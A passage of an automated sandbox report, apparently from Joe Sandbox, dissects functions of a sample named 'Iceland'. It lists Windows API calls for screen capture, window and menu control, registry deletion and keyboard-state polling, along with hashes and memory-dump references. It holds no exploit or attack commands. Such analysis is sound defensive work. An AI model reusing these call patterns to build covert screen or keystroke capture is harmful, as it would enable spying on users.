                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1C19D35204201AFE714DF68C584F6ABBE1BF85318F14859CF49A8B3A2CB75ED46CB91
                                                                                                                                                                                                                                                                Function 00AA2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AA3035
                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00AA3045
                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00AA3051
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00AA305E
                                                                                                                                                                                                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00AA30CA
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00AA3109
                                                                                                                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00AA312D
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00AA3135
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00AA313E
                                                                                                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 00AA3145
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00AA3150
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 77de090a9ea181fc1a8035710459489ab01fa1ac93e6f1210b40aa1547c7afbf
                                                                                                                                                                                                                                                                • Instruction ID: 8bb3e31a6d92b55493ce0e9a08d17479d6c759521c4fbdbc23a62dfcf9727265
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77de090a9ea181fc1a8035710459489ab01fa1ac93e6f1210b40aa1547c7afbf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C61C276D00219AFCF14CFE8D984EAEBBB5FF48310F208529E555A7250E771A951CF90
                                                                                                                                                                                                                                                                Function 00ABA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00ABA990
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00ABA9A7
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00ABA9B3
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00ABA9C9
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00ABAC15
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00ABAC33
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00ABAC54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00ABAC73
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00ABAC95
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?), ref: 00ABACBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: d0263c7bc6ff2855ce772a90682ec027fe6462caf931e8deeb70aa55698a9a3d
                                                                                                                                                                                                                                                                • Instruction ID: 5f0ff47fca7082289ca81dc5c569626b4cc9139594c2a793ddf428998ffa46cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0263c7bc6ff2855ce772a90682ec027fe6462caf931e8deeb70aa55698a9a3d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94B17731600219EFDF14CFA8C9847EE7BB6FF54700F188069EC59AB296D770A980CB61
                                                                                                                                                                                                                                                                Function 00A852AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00A852E6
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00A85328
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A85339
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00A85345
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8537A
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00A853B2
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00A853EB
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00A85445
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00A85477
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A854EF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                • Opcode ID: 1447dc7486bdb3e0b7c698c7a40d8aa6566f08fdcaa9fb76308460b9d7880173
                                                                                                                                                                                                                                                                • Instruction ID: daae4808bcca6685445d5c07d988ad3d7d46a49035b517ba959adb893da1af3c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1447dc7486bdb3e0b7c698c7a40d8aa6566f08fdcaa9fb76308460b9d7880173
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2191E471904B06AFD708EF34D994BAAB7A9FF41344F004529FE8A86091EB31ED56CB91
                                                                                                                                                                                                                                                                Function 00AB976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AB97B6
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00AB97C6
                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00AB97D1
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00AB9879
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AB992B
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00AB9948
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00AB9958
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AB998A
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AB99CC
                                                                                                                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AB99FD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 7bbd7baa0e0b3f981043d25ceb2e90b1003a8831a1f8fba0687f8c9be3db9a7f
                                                                                                                                                                                                                                                                • Instruction ID: d07e26c43ec1bdad26461d34591bdf1bcee1c5d6021808fbcfa789320017dd33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bbd7baa0e0b3f981043d25ceb2e90b1003a8831a1f8fba0687f8c9be3db9a7f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E381A0715043019FD720CFA4D984AABBBECFB89354F140A1DFA85972A2DB70D905CBA2
                                                                                                                                                                                                                                                                Function 00A8C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(00AF29C0,000000FF,00000000,00000030), ref: 00A8C973
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00AF29C0,00000004,00000000,00000030), ref: 00A8C9A8
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00A8C9BA
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00A8CA00
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00A8CA1D
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00A8CA49
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00A8CA90
                                                                                                                                                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A8CAD6
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8CAEB
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A8CB0C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: b057bf125600f6de0423c9ad48edc13496918ec01b5d6b0bbcccf5b9ab271af3
                                                                                                                                                                                                                                                                • Instruction ID: 5ed73c806feee7bdf70550b22e74b1c3fb05fc7170cd1b13fb7df3dbfd337e13
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b057bf125600f6de0423c9ad48edc13496918ec01b5d6b0bbcccf5b9ab271af3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E561AE70900209AFDF15EFA8D989EEEBBB9FB053A8F040255E951A3252D730AD11CF70
                                                                                                                                                                                                                                                                Function 00A8E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A8E4D4
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A8E4FA
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A8E504
                                                                                                                                                                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00A8E554
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A8E570
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                • Opcode ID: 84bda2f353900e9b21debb26cfa1f0db8124236939ba97722149c76ce077d97a
                                                                                                                                                                                                                                                                • Instruction ID: 48d6e5a18d7b2433a40035c995c9625ce70f2e1976a5b44acb605a52a7980b5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84bda2f353900e9b21debb26cfa1f0db8124236939ba97722149c76ce077d97a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA41F576A00214BBEB00FB749D47EFF7B6CEF95720F100529F900A6082FB759A0193A5
                                                                                                                                                                                                                                                                Function 00AAD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AAD6C4
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00AAD6ED
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AAD7A8
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00AAD70A
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00AAD71D
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AAD72F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00AAD765
                                                                                                                                                                                                                                                                  • Part of subcall function 00AAD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00AAD788
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AAD753
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                • Opcode ID: 898460c269379e71769bef7010ea7667021a460d79a1ae435f8bd49ef61e0d99
                                                                                                                                                                                                                                                                • Instruction ID: 3089014fe2143b993d78864fbd0110b687ca201e8658305f32ad84f4e862cdbe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 898460c269379e71769bef7010ea7667021a460d79a1ae435f8bd49ef61e0d99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5131A175901128BBDB25DB91DC88EFFBB7CEF46750F000265F846E3191EB349E469AA0
                                                                                                                                                                                                                                                                Function 00A8EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00A8EFCB
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F215: timeGetTime.WINMM(?,?,00A8EFEB), ref: 00A3F219
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00A8EFF8
                                                                                                                                                                                                                                                                • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00A8F01C
                                                                                                                                                                                                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A8F03E
                                                                                                                                                                                                                                                                • SetActiveWindow.USER32 ref: 00A8F05D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A8F06B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A8F08A
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00A8F095
                                                                                                                                                                                                                                                                • IsWindow.USER32 ref: 00A8F0A1
                                                                                                                                                                                                                                                                • EndDialog.USER32(00000000), ref: 00A8F0B2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                • Opcode ID: 9cf70b637f03b01adce52935e50a32debbad041661c93fe38b63e8bb17aac671
                                                                                                                                                                                                                                                                • Instruction ID: 4db3817aed90c66df6dd31f34511c384498aa41af0cfada40ebe29ed9c68f1b5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf70b637f03b01adce52935e50a32debbad041661c93fe38b63e8bb17aac671
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5215BB6640206BFEB21FFE0EC89A267B6AFB49745B100125F501C6273FB718C42DB61
                                                                                                                                                                                                                                                                Function 00A8F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A8F374
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A8F38A
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A8F39B
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A8F3AD
                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A8F3BE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                • Opcode ID: cabc32eed01c5370d6c239012eebadcea045fd9dca6117095109fd30dad704bd
                                                                                                                                                                                                                                                                • Instruction ID: 30770ed5cf12d6fe33c6e51094fe8e2f9fc14e34e30a1abbeaaba682146ea78b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cabc32eed01c5370d6c239012eebadcea045fd9dca6117095109fd30dad704bd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3117371A901A97ED720B7AA9C4AEFF6B7CEFD1B40F4008397811E60D1EAA05D45C6B1
                                                                                                                                                                                                                                                                Function 00A8A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8A9D9
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8AA44
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00A8AA64
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00A8AA7B
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00A8AAAA
                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00A8AABB
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00A8AAE7
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00A8AAF5
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00A8AB1E
                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00A8AB2C
